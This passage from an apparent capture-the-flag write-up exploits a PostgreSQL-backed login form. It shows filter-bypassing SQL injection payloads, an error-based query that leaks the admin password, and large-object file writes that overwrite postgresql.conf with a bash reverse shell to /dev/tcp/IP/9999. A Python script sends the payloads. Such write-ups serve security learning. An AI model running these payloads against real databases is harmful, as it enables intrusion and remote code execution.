net.sf.jsqlparser.expression.StringValue\n",{"type":33,"tag":128,"props":27541,"children":27542},{"class":130,"line":362},[27543],{"type":33,"tag":128,"props":27544,"children":27545},{},[27546],{"type":38,"value":27547},"app-1 | [SQLParser.restrictExpr] left_expr: 'A'\n",{"type":33,"tag":128,"props":27549,"children":27550},{"class":130,"line":403},[27551],{"type":33,"tag":128,"props":27552,"children":27553},{},[27554],{"type":38,"value":27555},"app-1 | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\n",{"type":33,"tag":128,"props":27557,"children":27558},{"class":130,"line":739},[27559],{"type":33,"tag":128,"props":27560,"children":27561},{},[27562],{"type":38,"value":27563},"app-1 | [SQLParser.restrictExpr] right_expr: 'B'\n",{"type":33,"tag":128,"props":27565,"children":27566},{"class":130,"line":765},[27567],{"type":33,"tag":128,"props":27568,"children":27569},{},[27570],{"type":38,"value":27571},"app-1 | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",{"type":33,"tag":47,"props":27573,"children":27574},{},[27575,27577,27583],{"type":38,"value":27576},"And we can see that both parts are indeed of type ",{"type":33,"tag":105,"props":27578,"children":27580},{"className":27579},[],[27581],{"type":38,"value":27582},"StringValue",{"type":38,"value":215},{"type":33,"tag":47,"props":27585,"children":27586},{},[27587],{"type":38,"value":27588},"So we can inject what we want in the right part provided it's concatenated with a string like this:",{"type":33,"tag":114,"props":27590,"children":27591},{"lang":25649},[27592],{"type":33,"tag":119,"props":27593,"children":27595},{"code":27594},"username=a'||'b'||INJECTION||'&passwd=a\n",[27596],{"type":33,"tag":105,"props":27597,"children":27598},{"__ignoreMap":8},[27599],{"type":38,"value":27594},{"type":33,"tag":47,"props":27601,"children":27602},{},[27603,27605,27611],{"type":38,"value":27604},"We can try with a simple injection like ",{"type":33,"tag":105,"props":27606,"children":27608},{"className":27607},[],[27609],{"type":38,"value":27610},"Select 1",{"type":38,"value":284},{"type":33,"tag":114,"props":27613,"children":27614},{"lang":25649},[27615],{"type":33,"tag":119,"props":27616,"children":27618},{"code":27617},"username=a'||'b'||query_to_xml(chr(115)||chr(101)||chr(108)||chr(101)||chr(99)||chr(116)||chr(32)||chr(49),true,true,'')||'&passwd=a\n",[27619],{"type":33,"tag":105,"props":27620,"children":27621},{"__ignoreMap":8},[27622],{"type":38,"value":27617},{"type":33,"tag":47,"props":27624,"children":27625},{},[27626],{"type":38,"value":27627},"We can see in the logs that the query is accepted by the filter.",{"type":33,"tag":114,"props":27629,"children":27630},{"lang":25649},[27631],{"type":33,"tag":119,"props":27632,"children":27634},{"code":27633,"language":25649,"meta":8,"className":27370,"style":8},"app-1 | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1 | [SQLParser.restrictExpr] left_expr: 'A'\napp-1 | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1 | [SQLParser.restrictExpr] right_expr: 'B'\napp-1 | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || ''\n",[27635],{"type":33,"tag":105,"props":27636,"children":27637},{"__ignoreMap":8},[27638,27645,27652,27659,27666],{"type":33,"tag":128,"props":27639,"children":27640},{"class":130,"line":131},[27641],{"type":33,"tag":128,"props":27642,"children":27643},{},[27644],{"type":38,"value":27539},{"type":33,"tag":128,"props":27646,"children":27647},{"class":130,"line":362},[27648],{"type":33,"tag":128,"props":27649,"children":27650},{},[27651],{"type":38,"value":27547},{"type":33,"tag":128,"props":27653,"children":27654},{"class":130,"line":403},[27655],{"type":33,"tag":128,"props":27656,"children":27657},{},[27658],{"type":38,"value":27555},{"type":33,"tag":128,"props":27660,"children":27661},{"class":130,"line":739},[27662],{"type":33,"tag":128,"props":27663,"children":27664},{},[27665],{"type":38,"value":27563},{"type":33,"tag":128,"props":27667,"children":27668},{"class":130,"line":765},[27669],{"type":33,"tag":128,"props":27670,"children":27671},{},[27672],{"type":38,"value":27673},"app-1 | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || ''\n",{"type":33,"tag":47,"props":27675,"children":27676},{},[27677],{"type":38,"value":27678},"On the return of the request we can also see we don't have any error message telling us that the query is not accepted. So we can say that the query is accepted by the filter.",{"type":33,"tag":75,"props":27680,"children":27682},{"imgSrc":27681},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559128/writeups/chatter-box/sqli_ok.webp",[],{"type":33,"tag":40,"props":27684,"children":27686},{"id":27685},"from-postgresqli-to-rce-unintended",[27687],{"type":38,"value":27688},"From postgreSQLI to RCE [UNINTENDED]",{"type":33,"tag":47,"props":27690,"children":27691},{},[27692],{"type":38,"value":27693},"No we can easily leak password of admin user, with visible sql error, with a payload like this:",{"type":33,"tag":114,"props":27695,"children":27696},{"lang":25649},[27697],{"type":33,"tag":119,"props":27698,"children":27700},{"code":27699},"(SELECT CAST((SELECT passwd FROM message_users LIMIT 1) AS int))\n",[27701],{"type":33,"tag":105,"props":27702,"children":27703},{"__ignoreMap":8},[27704],{"type":38,"value":27699},{"type":33,"tag":47,"props":27706,"children":27707},{},[27708,27710,27716,27717,27723],{"type":38,"value":27709},"But after several hours of research on the other controllers (",{"type":33,"tag":105,"props":27711,"children":27713},{"className":27712},[],[27714],{"type":38,"value":27715},"NotifyController",{"type":38,"value":6345},{"type":33,"tag":105,"props":27718,"children":27720},{"className":27719},[],[27721],{"type":38,"value":27722},"MessageBoardController",{"type":38,"value":27724},"). We was not able to go further. So we thought that these controllers were rabbit-holes.",{"type":33,"tag":47,"props":27726,"children":27727},{},[27728],{"type":38,"value":27729},"So we tried to research how to deepen the SQL injection in order to execute code on the server.",{"type":33,"tag":47,"props":27731,"children":27732},{},[27733],{"type":38,"value":27734},"So now we can ask ourselves, from a select statement in postgresql how can we interact with the server in order to compromise it and execute code?",{"type":33,"tag":81,"props":27736,"children":27738},{"id":27737},"arbitrary-file-write-read",[27739],{"type":38,"value":27740},"Arbitrary file write / read",{"type":33,"tag":47,"props":27742,"children":27743},{},[27744],{"type":38,"value":27745},"PostgreSQL's large object facility offers stream-style access to user data stored in a specialized large-object structure. This streaming access proves valuable when dealing with data values that are impractical to manipulate as a complete entity due to their size.",{"type":33,"tag":47,"props":27747,"children":27748},{},[27749],{"type":38,"value":27750},"Thus, we can read and write files on the server using large objects.",{"type":33,"tag":47,"props":27752,"children":27753},{},[27754,27756,27762,27764,27769],{"type":38,"value":27755},"Unfortunately, the postgres user of the docker does not have the necessary rights to read the ",{"type":33,"tag":105,"props":27757,"children":27759},{"className":27758},[],[27760],{"type":38,"value":27761},"/flag",{"type":38,"value":27763}," file, so we must at all costs execute the elf ",{"type":33,"tag":105,"props":27765,"children":27767},{"className":27766},[],[27768],{"type":38,"value":5294},{"type":38,"value":215},{"type":33,"tag":47,"props":27771,"children":27772},{},[27773],{"type":38,"value":27774},"So we will focus on how to write files to the server:",{"type":33,"tag":47,"props":27776,"children":27777},{},[27778,27780,27786,27788,27794],{"type":38,"value":27779},"For this, we must use the ",{"type":33,"tag":105,"props":27781,"children":27783},{"className":27782},[],[27784],{"type":38,"value":27785},"lo_frombytea",{"type":38,"value":27787}," function, which allows writing to a large postgresql object and finally call the ",{"type":33,"tag":105,"props":27789,"children":27791},{"className":27790},[],[27792],{"type":38,"value":27793},"lo_export",{"type":38,"value":27795}," function with the path that allows writing the large object to the server disk.",{"type":33,"tag":114,"props":27797,"children":27798},{"lang":8},[27799],{"type":33,"tag":119,"props":27800,"children":27802},{"code":27801},"SELECT lo_from_bytea(10000, decode('cHduZWQK', 'base64'))\nSELECT lo_export(10000, '/tmp/pwn')\n",[27803],{"type":33,"tag":105,"props":27804,"children":27805},{"__ignoreMap":8},[27806],{"type":38,"value":27801},{"type":33,"tag":47,"props":27808,"children":27809},{},[27810],{"type":38,"value":27811},"Note that both functions take as a first parameter an identifier, allowing to identify a large object, it is possible to put any identifier as long as it is not already used.",{"type":33,"tag":47,"props":27813,"children":27814},{},[27815],{"type":38,"value":27816},"After executing these two functions, we can see that the /tmp/pwn file has been successfully created with its content",{"type":33,"tag":75,"props":27818,"children":27820},{"imgSrc":27819,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559178/writeups/chatter-box/file_write_pwn.webp",[],{"type":33,"tag":47,"props":27822,"children":27823},{},[27824],{"type":38,"value":27825},"We now have a POC that allows writing files to the system. Also note that these functions can also allow rewriting a file already created.",{"type":33,"tag":81,"props":27827,"children":27829},{"id":27828},"postgresqlconf",[27830],{"type":38,"value":8844},{"type":33,"tag":47,"props":27832,"children":27833},{},[27834,27836,27841],{"type":38,"value":27835},"Once we have been able to rewrite files, we may ask ourselves which file would be interesting to rewrite? The ",{"type":33,"tag":105,"props":27837,"children":27839},{"className":27838},[],[27840],{"type":38,"value":8844},{"type":38,"value":27842}," file of course !!",{"type":33,"tag":47,"props":27844,"children":27845},{},[27846],{"type":38,"value":27847},"An interesting option in the postgresql configuration is the \"ssl_passphrase_command\" option.",{"type":33,"tag":75,"props":27849,"children":27851},{"imgSrc":27850,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559212/writeups/chatter-box/doc_passphrase_command.webp",[],{"type":33,"tag":47,"props":27853,"children":27854},{},[27855],{"type":38,"value":27856},"This option allows to execute a command if the ssl key is encrypted with a passphrase.",{"type":33,"tag":47,"props":27858,"children":27859},{},[27860],{"type":38,"value":27861},"We must therefore generate a new key that includes a passphrase, so we will use the following command:",{"type":33,"tag":114,"props":27863,"children":27864},{"lang":116},[27865],{"type":33,"tag":119,"props":27866,"children":27868},{"code":27867,"language":116,"meta":8,"className":121,"style":8},"openssl rsa -aes256 -in /etc/ssl/private/ssl-cert-snakeoil.key -out ./my_new_key\n",[27869],{"type":33,"tag":105,"props":27870,"children":27871},{"__ignoreMap":8},[27872],{"type":33,"tag":128,"props":27873,"children":27874},{"class":130,"line":131},[27875,27880,27885,27890,27895,27900,27905],{"type":33,"tag":128,"props":27876,"children":27877},{"style":135},[27878],{"type":38,"value":27879},"openssl",{"type":33,"tag":128,"props":27881,"children":27882},{"style":140},[27883],{"type":38,"value":27884}," rsa",{"type":33,"tag":128,"props":27886,"children":27887},{"style":151},[27888],{"type":38,"value":27889}," -aes256",{"type":33,"tag":128,"props":27891,"children":27892},{"style":151},[27893],{"type":38,"value":27894}," -in",{"type":33,"tag":128,"props":27896,"children":27897},{"style":140},[27898],{"type":38,"value":27899}," /etc/ssl/private/ssl-cert-snakeoil.key",{"type":33,"tag":128,"props":27901,"children":27902},{"style":151},[27903],{"type":38,"value":27904}," -out",{"type":33,"tag":128,"props":27906,"children":27907},{"style":140},[27908],{"type":38,"value":27909}," ./my_new_key\n",{"type":33,"tag":47,"props":27911,"children":27912},{},[27913],{"type":38,"value":27914},"Result of the command:",{"type":33,"tag":75,"props":27916,"children":27918},{"imgSrc":27917},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559241/writeups/chatter-box/rsa_command.webp",[],{"type":33,"tag":47,"props":27920,"children":27921},{},[27922],{"type":38,"value":27923},"Once our key is generated, we must find a file to rewrite with 600 rights. If our file containing the key does not have these rights then the server will not accept it will raise an exception.",{"type":33,"tag":47,"props":27925,"children":27926},{},[27927],{"type":38,"value":27928},"To search this specifics files we use the following command:",{"type":33,"tag":114,"props":27930,"children":27931},{"lang":116},[27932],{"type":33,"tag":119,"props":27933,"children":27935},{"code":27934,"language":116,"meta":8,"className":121,"style":8},"find /var/lib/postgresql/13/ -type f -perm 600 -user postgres -writable 2>&-\n",[27936],{"type":33,"tag":105,"props":27937,"children":27938},{"__ignoreMap":8},[27939],{"type":33,"tag":128,"props":27940,"children":27941},{"class":130,"line":131},[27942,27947,27952,27957,27961,27966,27970,27975,27979,27984,27989],{"type":33,"tag":128,"props":27943,"children":27944},{"style":135},[27945],{"type":38,"value":27946},"find",{"type":33,"tag":128,"props":27948,"children":27949},{"style":140},[27950],{"type":38,"value":27951}," /var/lib/postgresql/13/",{"type":33,"tag":128,"props":27953,"children":27954},{"style":151},[27955],{"type":38,"value":27956}," -type",{"type":33,"tag":128,"props":27958,"children":27959},{"style":140},[27960],{"type":38,"value":10534},{"type":33,"tag":128,"props":27962,"children":27963},{"style":151},[27964],{"type":38,"value":27965}," -perm",{"type":33,"tag":128,"props":27967,"children":27968},{"style":523},[27969],{"type":38,"value":7683},{"type":33,"tag":128,"props":27971,"children":27972},{"style":151},[27973],{"type":38,"value":27974}," -user",{"type":33,"tag":128,"props":27976,"children":27977},{"style":140},[27978],{"type":38,"value":8702},{"type":33,"tag":128,"props":27980,"children":27981},{"style":151},[27982],{"type":38,"value":27983}," -writable",{"type":33,"tag":128,"props":27985,"children":27986},{"style":300},[27987],{"type":38,"value":27988}," 2>&",{"type":33,"tag":128,"props":27990,"children":27991},{"style":140},[27992],{"type":38,"value":27993},"-\n",{"type":33,"tag":47,"props":27995,"children":27996},{},[27997],{"type":38,"value":27914},{"type":33,"tag":75,"props":27999,"children":28001},{"imgSrc":28000},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559268/writeups/chatter-box/find_command.webp",[],{"type":33,"tag":47,"props":28003,"children":28004},{},[28005,28007,28013],{"type":38,"value":28006},"So the most interesting file in our case is the ",{"type":33,"tag":105,"props":28008,"children":28010},{"className":28009},[],[28011],{"type":38,"value":28012},"PG_VERSION",{"type":38,"value":28014}," file. After our upload it will contain the content of our key.",{"type":33,"tag":47,"props":28016,"children":28017},{},[28018],{"type":38,"value":28019},"Our postgresql configuration will be as follows:",{"type":33,"tag":114,"props":28021,"children":28022},{"lang":8945},[28023],{"type":33,"tag":119,"props":28024,"children":28026},{"code":28025,"language":8945,"meta":8,"className":8949,"style":8},"# - SSL -\n\nssl = on\nssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\nssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\nssl_passphrase_command_supports_reload = on\nssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n",[28027],{"type":33,"tag":105,"props":28028,"children":28029},{"__ignoreMap":8},[28030,28038,28045,28053,28061,28069,28077],{"type":33,"tag":128,"props":28031,"children":28032},{"class":130,"line":131},[28033],{"type":33,"tag":128,"props":28034,"children":28035},{},[28036],{"type":38,"value":28037},"# - SSL -\n",{"type":33,"tag":128,"props":28039,"children":28040},{"class":130,"line":362},[28041],{"type":33,"tag":128,"props":28042,"children":28043},{"emptyLinePlaceholder":896},[28044],{"type":38,"value":899},{"type":33,"tag":128,"props":28046,"children":28047},{"class":130,"line":403},[28048],{"type":33,"tag":128,"props":28049,"children":28050},{},[28051],{"type":38,"value":28052},"ssl = on\n",{"type":33,"tag":128,"props":28054,"children":28055},{"class":130,"line":739},[28056],{"type":33,"tag":128,"props":28057,"children":28058},{},[28059],{"type":38,"value":28060},"ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\n",{"type":33,"tag":128,"props":28062,"children":28063},{"class":130,"line":765},[28064],{"type":33,"tag":128,"props":28065,"children":28066},{},[28067],{"type":38,"value":28068},"ssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\n",{"type":33,"tag":128,"props":28070,"children":28071},{"class":130,"line":804},[28072],{"type":33,"tag":128,"props":28073,"children":28074},{},[28075],{"type":38,"value":28076},"ssl_passphrase_command_supports_reload = on\n",{"type":33,"tag":128,"props":28078,"children":28079},{"class":130,"line":839},[28080],{"type":33,"tag":128,"props":28081,"children":28082},{},[28083],{"type":38,"value":28084},"ssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n",{"type":33,"tag":47,"props":28086,"children":28087},{},[28088],{"type":38,"value":28089},"Once our configuration is uploaded, we will need to reload the postgresql configuration. To do this, we can simply call the pg_reload_conf function which will have the effect of applying the new config.",{"type":33,"tag":40,"props":28091,"children":28092},{"id":21053},[28093],{"type":38,"value":21056},{"type":33,"tag":47,"props":28095,"children":28096},{},[28097],{"type":38,"value":28098},"So to get our RCE we are going to do this step by step:",{"type":33,"tag":239,"props":28100,"children":28101},{},[28102],{"type":33,"tag":243,"props":28103,"children":28104},{},[28105],{"type":38,"value":28106},"Upload the malicious configuration:",{"type":33,"tag":114,"props":28108,"children":28109},{"lang":10227},[28110],{"type":33,"tag":119,"props":28111,"children":28113},{"code":28112,"language":10227,"meta":8,"className":10231,"style":8},"rand_num = random.randint(31337, 31337*5)\n \nwith open(\"files/conf.b64\", \"r\") as f:\n conf = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{conf}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/etc/postgresql/13/main/postgresql.conf'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[28114],{"type":33,"tag":105,"props":28115,"children":28116},{"__ignoreMap":8},[28117,28170,28177,28238,28265,28272,28339,28442,28491],{"type":33,"tag":128,"props":28118,"children":28119},{"class":130,"line":131},[28120,28125,28129,28133,28137,28141,28145,28150,28154,28158,28162,28166],{"type":33,"tag":128,"props":28121,"children":28122},{"style":323},[28123],{"type":38,"value":28124},"rand_num ",{"type":33,"tag":128,"props":28126,"children":28127},{"style":312},[28128],{"type":38,"value":315},{"type":33,"tag":128,"props":28130,"children":28131},{"style":323},[28132],{"type":38,"value":10424},{"type":33,"tag":128,"props":28134,"children":28135},{"style":312},[28136],{"type":38,"value":215},{"type":33,"tag":128,"props":28138,"children":28139},{"style":323},[28140],{"type":38,"value":10433},{"type":33,"tag":128,"props":28142,"children":28143},{"style":312},[28144],{"type":38,"value":5566},{"type":33,"tag":128,"props":28146,"children":28147},{"style":523},[28148],{"type":38,"value":28149},"31337",{"type":33,"tag":128,"props":28151,"children":28152},{"style":312},[28153],{"type":38,"value":5584},{"type":33,"tag":128,"props":28155,"children":28156},{"style":523},[28157],{"type":38,"value":10451},{"type":33,"tag":128,"props":28159,"children":28160},{"style":300},[28161],{"type":38,"value":9683},{"type":33,"tag":128,"props":28163,"children":28164},{"style":523},[28165],{"type":38,"value":10460},{"type":33,"tag":128,"props":28167,"children":28168},{"style":312},[28169],{"type":38,"value":2427},{"type":33,"tag":128,"props":28171,"children":28172},{"class":130,"line":362},[28173],{"type":33,"tag":128,"props":28174,"children":28175},{"style":323},[28176],{"type":38,"value":10680},{"type":33,"tag":128,"props":28178,"children":28179},{"class":130,"line":403},[28180,28185,28189,28193,28197,28202,28206,28210,28214,28218,28222,28226,28230,28234],{"type":33,"tag":128,"props":28181,"children":28182},{"style":1576},[28183],{"type":38,"value":28184},"with",{"type":33,"tag":128,"props":28186,"children":28187},{"style":437},[28188],{"type":38,"value":10725},{"type":33,"tag":128,"props":28190,"children":28191},{"style":312},[28192],{"type":38,"value":5566},{"type":33,"tag":128,"props":28194,"children":28195},{"style":676},[28196],{"type":38,"value":669},{"type":33,"tag":128,"props":28198,"children":28199},{"style":140},[28200],{"type":38,"value":28201},"files/conf.b64",{"type":33,"tag":128,"props":28203,"children":28204},{"style":676},[28205],{"type":38,"value":669},{"type":33,"tag":128,"props":28207,"children":28208},{"style":312},[28209],{"type":38,"value":5584},{"type":33,"tag":128,"props":28211,"children":28212},{"style":676},[28213],{"type":38,"value":679},{"type":33,"tag":128,"props":28215,"children":28216},{"style":140},[28217],{"type":38,"value":10916},{"type":33,"tag":128,"props":28219,"children":28220},{"style":676},[28221],{"type":38,"value":669},{"type":33,"tag":128,"props":28223,"children":28224},{"style":312},[28225],{"type":38,"value":2966},{"type":33,"tag":128,"props":28227,"children":28228},{"style":1576},[28229],{"type":38,"value":10759},{"type":33,"tag":128,"props":28231,"children":28232},{"style":323},[28233],{"type":38,"value":10534},{"type":33,"tag":128,"props":28235,"children":28236},{"style":312},[28237],{"type":38,"value":5318},{"type":33,"tag":128,"props":28239,"children":28240},{"class":130,"line":739},[28241,28245,28249,28253,28257,28261],{"type":33,"tag":128,"props":28242,"children":28243},{"style":323},[28244],{"type":38,"value":11219},{"type":33,"tag":128,"props":28246,"children":28247},{"style":312},[28248],{"type":38,"value":315},{"type":33,"tag":128,"props":28250,"children":28251},{"style":323},[28252],{"type":38,"value":10534},{"type":33,"tag":128,"props":28254,"children":28255},{"style":312},[28256],{"type":38,"value":215},{"type":33,"tag":128,"props":28258,"children":28259},{"style":323},[28260],{"type":38,"value":10810},{"type":33,"tag":128,"props":28262,"children":28263},{"style":312},[28264],{"type":38,"value":7857},{"type":33,"tag":128,"props":28266,"children":28267},{"class":130,"line":765},[28268],{"type":33,"tag":128,"props":28269,"children":28270},{"emptyLinePlaceholder":896},[28271],{"type":38,"value":899},{"type":33,"tag":128,"props":28273,"children":28274},{"class":130,"line":804},[28275,28280,28284,28288,28292,28296,28301,28305,28310,28314,28318,28322,28326,28330,28335],{"type":33,"tag":128,"props":28276,"children":28277},{"style":323},[28278],{"type":38,"value":28279},"query ",{"type":33,"tag":128,"props":28281,"children":28282},{"style":312},[28283],{"type":38,"value":315},{"type":33,"tag":128,"props":28285,"children":28286},{"style":323},[28287],{"type":38,"value":25709},{"type":33,"tag":128,"props":28289,"children":28290},{"style":312},[28291],{"type":38,"value":5566},{"type":33,"tag":128,"props":28293,"children":28294},{"style":300},[28295],{"type":38,"value":11107},{"type":33,"tag":128,"props":28297,"children":28298},{"style":140},[28299],{"type":38,"value":28300},"\"(SELECT lo_from_bytea(",{"type":33,"tag":128,"props":28302,"children":28303},{"style":151},[28304],{"type":38,"value":7246},{"type":33,"tag":128,"props":28306,"children":28307},{"style":323},[28308],{"type":38,"value":28309},"rand_num",{"type":33,"tag":128,"props":28311,"children":28312},{"style":151},[28313],{"type":38,"value":5730},{"type":33,"tag":128,"props":28315,"children":28316},{"style":140},[28317],{"type":38,"value":11130},{"type":33,"tag":128,"props":28319,"children":28320},{"style":151},[28321],{"type":38,"value":7246},{"type":33,"tag":128,"props":28323,"children":28324},{"style":323},[28325],{"type":38,"value":8945},{"type":33,"tag":128,"props":28327,"children":28328},{"style":151},[28329],{"type":38,"value":5730},{"type":33,"tag":128,"props":28331,"children":28332},{"style":140},[28333],{"type":38,"value":28334},"', 'base64')))\"",{"type":33,"tag":128,"props":28336,"children":28337},{"style":312},[28338],{"type":38,"value":2427},{"type":33,"tag":128,"props":28340,"children":28341},{"class":130,"line":839},[28342,28347,28351,28355,28359,28363,28367,28372,28376,28380,28384,28388,28393,28397,28401,28405,28409,28413,28418,28422,28426,28430,28434,28438],{"type":33,"tag":128,"props":28343,"children":28344},{"style":323},[28345],{"type":38,"value":28346},"r ",{"type":33,"tag":128,"props":28348,"children":28349},{"style":312},[28350],{"type":38,"value":315},{"type":33,"tag":128,"props":28352,"children":28353},{"style":323},[28354],{"type":38,"value":10587},{"type":33,"tag":128,"props":28356,"children":28357},{"style":312},[28358],{"type":38,"value":215},{"type":33,"tag":128,"props":28360,"children":28361},{"style":323},[28362],{"type":38,"value":5561},{"type":33,"tag":128,"props":28364,"children":28365},{"style":312},[28366],{"type":38,"value":5566},{"type":33,"tag":128,"props":28368,"children":28369},{"style":151},[28370],{"type":38,"value":28371},"URL_TARGET",{"type":33,"tag":128,"props":28373,"children":28374},{"style":312},[28375],{"type":38,"value":5584},{"type":33,"tag":128,"props":28377,"children":28378},{"style":306},[28379],{"type":38,"value":13545},{"type":33,"tag":128,"props":28381,"children":28382},{"style":312},[28383],{"type":38,"value":315},{"type":33,"tag":128,"props":28385,"children":28386},{"style":676},[28387],{"type":38,"value":669},{"type":33,"tag":128,"props":28389,"children":28390},{"style":140},[28391],{"type":38,"value":28392},"username=",{"type":33,"tag":128,"props":28394,"children":28395},{"style":676},[28396],{"type":38,"value":669},{"type":33,"tag":128,"props":28398,"children":28399},{"style":300},[28400],{"type":38,"value":25605},{"type":33,"tag":128,"props":28402,"children":28403},{"style":323},[28404],{"type":38,"value":5810},{"type":33,"tag":128,"props":28406,"children":28407},{"style":300},[28408],{"type":38,"value":25605},{"type":33,"tag":128,"props":28410,"children":28411},{"style":676},[28412],{"type":38,"value":669},{"type":33,"tag":128,"props":28414,"children":28415},{"style":140},[28416],{"type":38,"value":28417},"&passwd=admin",{"type":33,"tag":128,"props":28419,"children":28420},{"style":676},[28421],{"type":38,"value":669},{"type":33,"tag":128,"props":28423,"children":28424},{"style":312},[28425],{"type":38,"value":5584},{"type":33,"tag":128,"props":28427,"children":28428},{"style":306},[28429],{"type":38,"value":10612},{"type":33,"tag":128,"props":28431,"children":28432},{"style":312},[28433],{"type":38,"value":315},{"type":33,"tag":128,"props":28435,"children":28436},{"style":323},[28437],{"type":38,"value":10621},{"type":33,"tag":128,"props":28439,"children":28440},{"style":312},[28441],{"type":38,"value":2427},{"type":33,"tag":128,"props":28443,"children":28444},{"class":130,"line":848},[28445,28449,28453,28457,28461,28465,28470,28474,28478,28482,28487],{"type":33,"tag":128,"props":28446,"children":28447},{"style":323},[28448],{"type":38,"value":28279},{"type":33,"tag":128,"props":28450,"children":28451},{"style":312},[28452],{"type":38,"value":315},{"type":33,"tag":128,"props":28454,"children":28455},{"style":323},[28456],{"type":38,"value":25709},{"type":33,"tag":128,"props":28458,"children":28459},{"style":312},[28460],{"type":38,"value":5566},{"type":33,"tag":128,"props":28462,"children":28463},{"style":300},[28464],{"type":38,"value":11107},{"type":33,"tag":128,"props":28466,"children":28467},{"style":140},[28468],{"type":38,"value":28469},"\"(SELECT lo_export(",{"type":33,"tag":128,"props":28471,"children":28472},{"style":151},[28473],{"type":38,"value":7246},{"type":33,"tag":128,"props":28475,"children":28476},{"style":323},[28477],{"type":38,"value":28309},{"type":33,"tag":128,"props":28479,"children":28480},{"style":151},[28481],{"type":38,"value":5730},{"type":33,"tag":128,"props":28483,"children":28484},{"style":140},[28485],{"type":38,"value":28486},", '/etc/postgresql/13/main/postgresql.conf'))\"",{"type":33,"tag":128,"props":28488,"children":28489},{"style":312},[28490],{"type":38,"value":2427},{"type":33,"tag":128,"props":28492,"children":28493},{"class":130,"line":976},[28494,28498,28502,28506,28510,28514,28518,28522,28526,28530,28534,28538,28542,28546,28550,28554,28558,28562,28566,28570,28574,28578,28582,28586],{"type":33,"tag":128,"props":28495,"children":28496},{"style":323},[28497],{"type":38,"value":28346},{"type":33,"tag":128,"props":28499,"children":28500},{"style":312},[28501],{"type":38,"value":315},{"type":33,"tag":128,"props":28503,"children":28504},{"style":323},[28505],{"type":38,"value":10587},{"type":33,"tag":128,"props":28507,"children":28508},{"style":312},[28509],{"type":38,"value":215},{"type":33,"tag":128,"props":28511,"children":28512},{"style":323},[28513],{"type":38,"value":5561},{"type":33,"tag":128,"props":28515,"children":28516},{"style":312},[28517],{"type":38,"value":5566},{"type":33,"tag":128,"props":28519,"children":28520},{"style":151},[28521],{"type":38,"value":28371},{"type":33,"tag":128,"props":28523,"children":28524},{"style":312},[28525],{"type":38,"value":5584},{"type":33,"tag":128,"props":28527,"children":28528},{"style":306},[28529],{"type":38,"value":13545},{"type":33,"tag":128,"props":28531,"children":28532},{"style":312},[28533],{"type":38,"value":315},{"type":33,"tag":128,"props":28535,"children":28536},{"style":676},[28537],{"type":38,"value":669},{"type":33,"tag":128,"props":28539,"children":28540},{"style":140},[28541],{"type":38,"value":28392},{"type":33,"tag":128,"props":28543,"children":28544},{"style":676},[28545],{"type":38,"value":669},{"type":33,"tag":128,"props":28547,"children":28548},{"style":300},[28549],{"type":38,"value":25605},{"type":33,"tag":128,"props":28551,"children":28552},{"style":323},[28553],{"type":38,"value":5810},{"type":33,"tag":128,"props":28555,"children":28556},{"style":300},[28557],{"type":38,"value":25605},{"type":33,"tag":128,"props":28559,"children":28560},{"style":676},[28561],{"type":38,"value":669},{"type":33,"tag":128,"props":28563,"children":28564},{"style":140},[28565],{"type":38,"value":28417},{"type":33,"tag":128,"props":28567,"children":28568},{"style":676},[28569],{"type":38,"value":669},{"type":33,"tag":128,"props":28571,"children":28572},{"style":312},[28573],{"type":38,"value":5584},{"type":33,"tag":128,"props":28575,"children":28576},{"style":306},[28577],{"type":38,"value":10612},{"type":33,"tag":128,"props":28579,"children":28580},{"style":312},[28581],{"type":38,"value":315},{"type":33,"tag":128,"props":28583,"children":28584},{"style":323},[28585],{"type":38,"value":10621},{"type":33,"tag":128,"props":28587,"children":28588},{"style":312},[28589],{"type":38,"value":2427},{"type":33,"tag":239,"props":28591,"children":28592},{},[28593],{"type":33,"tag":243,"props":28594,"children":28595},{},[28596],{"type":38,"value":28597},"Replace the PG_VERSION file with our key:",{"type":33,"tag":114,"props":28599,"children":28600},{"lang":10227},[28601],{"type":33,"tag":119,"props":28602,"children":28604},{"code":28603,"language":10227,"meta":8,"className":10231,"style":8},"rand_num = rand_num + 1\nwith open(\"files/cert.b64\", \"r\") as f:\n cert = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{cert}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/var/lib/postgresql/13/main/PG_VERSION'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", 